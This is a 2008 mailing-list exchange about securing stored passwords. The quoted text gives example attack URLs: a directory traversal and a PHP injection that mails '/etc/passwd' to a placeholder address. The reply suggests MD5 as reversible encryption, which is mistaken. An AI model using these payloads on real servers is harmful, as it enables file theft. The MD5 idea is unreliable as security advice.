[Klug-general] password / security question / coding

oly oly at digitaloctave.com
Sat Oct 18 23:36:27 UTC 2008


> Don't forget any web application can be a potential way into a server for an 
> attacker, as well as any listening daemons running on a box. If a web app can 
> read a file then the box does not need to be compromised for the attacker to 
> get the contents, just the app itself. Here is a really basic (and stupid) 
> example:
> 
> the logon url for an app is:
> http://url/script.php?template=login.html
> 
> an attacker could try (dir traversal):
> http://url/script.php?template=../../../../secret/passwd.txt
> 
> or even (code execution):
> http://url/script.php?template=<%php 
> mail('a at a.com', '',file_get_contents('/etc/passwd')); %>
> 
> these are lame examples but hopefully they make the point.
> 
> You can't hide anything in your source, so details of where and how passwords 
> are stored will be found; when implementing security, following best 
> practices is the way to go.
> 
> How about using some kind of master password to encrypt the password storage, 
> like how Mozilla, Firefox etc. can store form passwords. As long as you use 
> strong encryption and don't store the key anywhere, it would make breaking 
> into that store an unfeasible option for an attacker.

That may be an option, but I'm not sure quite what you mean when you say don't
store the key anywhere; surely I have to store the key somewhere to
decrypt the store to gain access to the passwords inside.

What about using an MD5 sum to encrypt the password, then using that same
sum to decrypt the passwords in the store? Is that kind of what you're
getting at?
